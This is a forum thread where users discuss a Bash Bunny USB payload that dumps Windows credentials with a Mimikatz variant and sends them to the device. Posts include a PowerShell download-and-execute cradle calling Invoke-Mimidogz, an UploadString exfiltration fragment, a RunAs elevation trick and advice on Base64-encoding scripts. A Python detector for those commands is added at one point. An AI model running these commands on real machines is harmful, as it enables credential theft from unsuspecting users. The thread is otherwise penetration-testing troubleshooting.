illwill, posted March 24, 2017 (edited October 8, 2017 by illwill)
Violation of CoC
SixthOfGod, posted March 24, 2017
When I run it, it's stalling out at the "WebServer started and Uploading Results" stage. Initially I thought it might be because I run as a full-time VPN client, and that was messing up the routes. But I disabled the VPN, and it's still stalling out. I'll try to step through the attack manually and see where it's breaking down.
oXis, posted March 24, 2017 (edited March 24, 2017 by oXis)
This is wicked, man.
wmrabb, posted March 24, 2017
This is awesome. Just tested on my Windows 7 virtual machine and it snagged the plaintext password in about 15 seconds. Great job!
azzarin, posted March 26, 2017 (edited March 26, 2017 by azzarin)
So far this just wiped everything in the loot folder. Tested on Windows 10. Going to do some more tests. Getting this, which might be the problem:

C:\WINDOWS\system32>powershell -c \"while \(\$true\) \{ If \(Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit\"\}\}
At line:1 char:91
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+ ~
Unexpected token '\' in expression or statement.
At line:1 char:92
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+ ~
Unexpected token '}' in expression or statement.
At line:1 char:94
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+ ~
Unexpected token '}' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
illwill (author), posted March 26, 2017 (edited October 8, 2017 by illwill)
Violation of CoC
korang, posted March 27, 2017 (edited March 27, 2017 by korang)
So when I try to run this on a laptop with certain policies in place, the CMD command asks for credentials to load, which then causes the whole script to fail after that point, as the command prompt does not get executed. So I think that bypassing UAC in this method is not working in my situation.
azzarin, posted March 27, 2017 (edited March 27, 2017 by azzarin)
17 hours ago, illwill said:
"you can't copy the code directly and paste it into a cmd prompt because there are backslashes that are escaping special characters...."

I just made it pause for longer. I did not copy it. I'll try again. Have you tried on Windows 10? It might have to do with the language. When it types the line in "cmd" I can see special characters, and it looks the same as I posted before. Tried on 2 PCs with Windows 10. And thanks for making this.
PoSHMagiC0de, posted March 27, 2017
I was reading through the script and noticed in some instances what korang says happens. I found out in my travels with the Rubber Ducky that not all Windows machines have GUI r set to open Run. Only on particular machines does (SHIFT-CTRL-ENTER) not run something as admin. Have not looked into why. I just got the BB last week, saw this script and see some improvements that can be made. My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all Windows 7 and up boxes. This is not in any way a diss of what is currently there. I just have ideas to improve it more. Also, I want to do what BunnyTap does and use a Node server instead of Python. I love Python, I use it a lot. Just trying other things. "Discovery is done through experimentation." (Dr. Whitehall, Marvel)

The secret I use for admin is, instead of using cmd by itself, I use PowerShell to run it and get the same prompting result as CTRL-SHIFT-ENTER would do:

powershell -c "Start-Process cmd -verb runas"

Now I don't have to worry about those shortcut keys not working. Also, for the yes command after the prompt, an ALT-Y works best for selecting it. I also found myself building my own agents to fire off a UAC bypass script that will launch my actual script. I did this a few times for fun, but it takes up another 5-10 seconds at the terminal to complete, so not practical in a time crunch.

Lastly, I see a lot of clear-text scripts in PowerShell. I always reduce and then encode my PowerShell scripts. It helps to avoid having to escape characters, since Base64 is universal. I am going to post some of my tricks from PowerShell Empire, PowerSploit and Rubber Ducky experiences with PowerShell that can be translated to the BB here shortly today.
azzarin, posted March 27, 2017
(quoting PoSHMagiC0de's post above)
Looking forward to seeing what you bring to the table.
azzarin, posted March 27, 2017
(quoting their own earlier post)
Changed to an English keyboard; it helped a bit, but it does not connect back to the Bash Bunny. Fails to connect.
Skiddie, posted March 27, 2017
Definitely one of the best ones yet, great job!
illwill (author), posted March 28, 2017 (edited October 8, 2017 by illwill)
Violation of CoC
hexa, posted March 28, 2017
First of all, thanks for the great payload. Secondly, unfortunately at first it didn't work, so after putting a pause in the payload I could see why. The PowerShell command creates a typo (I guess it has to do with the keyboard layout); look at the end, where the name of the file comes out as ÉOF instead of 'EOF'. Part of the output:

ew-Object Net.WebClient).UploadString('http://172.16.64.1/EOF',ÉOF');

So I solved the problem by changing all the file names from EOF to DOF. That way the payload creates a file 'DOF' and works great. Also change the name in the file server.py (EOF to DOF); change it to whatever you like, but avoid the letters E and A, since É also exists. I would suggest changing it in the original payload, since more people use a US keyboard layout. Anyway, thanks for the payload and keep up the good work!
qdba, posted March 28, 2017
Good work. I had the same idea because I'm pentesting a company who had forbidden USB storage and Internet access per policy. They have a good firewall with content filter and only a few Internet pages are allowed. So you saved me a lot of time coding the stuff... Thank you....

One idea: the whole QUACK stuff takes a lot of time. To save attack time, put a lot of the QUACK code into the PowerShell code. I had done it with your CredDump payload: https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds

Only a suggestion. You do really good work anyway.
illwill (author), posted March 29, 2017 (edited October 8, 2017 by illwill)
Violation of CoC
yeahits_ZP83, posted April 8, 2017
My new fav! Nice work.
MetateM, posted May 23, 2017
Anyone having luck with this payload? I have 1.1 working and I'm having the same problems as others. The payload executes but only creates an empty loot folder with nothing in it.
PoSHMagiC0de, posted May 23, 2017
I haven't tested illwill's payload since he built it. I just saw he built it and it looked cool from a code point of view. I know he had timing issues in the beginning. Best way is to test. To test, edit his payload.txt and remove the hidden parameter. This will make everything it does visible. See if any red errors go flying across the screen. You can edit the first line of the ps1 also, for testing only, to see if mimi is even running and sending output. At the bottom is the example of using tee-object to put output in a variable and display it to the console, so you see the output on the Windows machine and still capture it in the "o" variable. I have not given his payload a go yet directly to see the interaction. I like his Python server and the kill command he sends at the end to close it out rather than leave it running in the background all day.

IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');Invoke-Mimidogz -DumpCred | tee-object -Variable o
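Editor's note: as an added defensive example (my code, not illwill's payload or anything posted in this thread), here is a Python triage routine for process-creation command lines that recovers the script hidden behind -EncodedCommand (the Base64 wrapping PoSHMagiC0de recommends above) and flags the IEX + DownloadString cradle, the UploadString call, the hidden window and the RunAs prompt that the posts describe. The log lines are constructed, the indicator names are hypothetical, and the 172.16.64.1 address and md.ps1 name are the ones quoted in the thread.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators drawn from what the thread's payload does on the host: the IEX + DownloadString
# cradle, the UploadString exfiltration call, a hidden window and the RunAs prompt.
INDICATORS = {
    "download_cradle": re.compile(r"(IEX|Invoke-Expression).*DownloadString", re.I),
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "upload_exfil": re.compile(r"\.UploadString\(", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "runas_elevation": re.compile(r"Start-Process\s.*-verb\s+runas", re.I),
}
# powershell.exe accepts -e / -ec / -enc / -EncodedCommand followed by base64(UTF-16LE).
ENC_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

@dataclass
class Finding:
    command_line: str
    decoded: Optional[str]           # script recovered from -EncodedCommand, if any
    indicators: List[str] = field(default_factory=list)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or not base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> Finding:
    """Match indicators against the raw command line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    return Finding(cmdline, decoded, [n for n, rx in INDICATORS.items() if rx.search(text)])

def suspicious(cmdlines: List[str]) -> List[Finding]:
    return [f for f in map(analyze, cmdlines) if f.indicators]

# Constructed process-creation command lines, not real logs: the cradle posted above,
# the same cradle hidden behind -enc, and a benign administrative command.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1')"
SAMPLE_LOGS = [
    'powershell -w hidden -c "' + CRADLE + '"',
    "powershell -enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode(),
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]
```

Running suspicious(SAMPLE_LOGS) returns the first two entries, with the second one's decoded field holding the same cradle as the first; the benign -File command produces no indicators.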
illwill (author), posted May 29, 2017 (edited October 8, 2017 by illwill)
Violation of CoC
PoSHMagiC0de, posted May 30, 2017
Info on this module and similar ones. If you are trying to run Mimi-whatever on a fully updated Windows 10 machine, or even powerdump, good luck. It has been hardened against these. Avast is even able to sniff execution in Win 10, so it will detect mimikatz but not dogz, but dogz will still get nothing. Powerdump will throw an illegal ptr operation. Exploitation frameworks are having the same issue. Windows 7 seems not to have this issue. Avast will detect the exploitation framework too, freeze the operation of it coming up and inform the user of something funny going on and ask if they want to ignore or kill the process. The challenge is now on. So, on Windows 10 MS is making it tougher to steal creds in memory. Windows 7 shouldn't have any concern. Of course Win 10 people have to worry about MS spying on them with the Creators Update.
HeadScratchCode, posted June 5, 2017
This is one of the best payloads. Even if you can't snag the plain text (Windows 10), you still get the password hashes. If you can't get it working, just add a few more DELAYs. As I'm in China, I have to add Q SHIFT once it opens the terminal. This is because many systems use a pinyin input method that switches back and forth from English to Chinese by pressing SHIFT. If I don't, the terminal will fill up with Chinese characters. Great payload, dude!
PoSHMagiC0de, posted June 5, 2017
On my updated Win10 Pro machine and image it fails. The injects that some payloads need to do are not allowed anymore, even with PS2.0 enabled. Update the Win10 machine to the latest updates and you may see the same. If it is Win10 Home, I do not know how it will work. I noticed that in any exploit framework I have, the process injects are failing now on Win10.
b0N3z, posted June 5, 2017
I tried to mess around with mimikatz on Win 10 and it denied me every time, no matter what directory I used or even as an admin.
KenPC, posted June 23, 2017 (edited June 24, 2017 by KenPC)
Sorry for a stupid question, but where to put md.ps1, server.py and p.ps1 to get this to work? Root of the Bash Bunny filesystem or in the USB storage FS?

Edit: after looking at the payload .txt, I noticed it's calling it in $switchdir. I got it now.

EDIT2: anyone having issues with it waiting for the webserver, when it's up and hosting p.ps1? When I manually run it, the BB goes green. Otherwise it just sits flashing blue forever. Running on a Windows 7 Pro base install, fully up to date. I'm no PS pro, otherwise I'd debug it myself :/ I'm more of a physical penetration-ist myself. Just dabbled in some coding.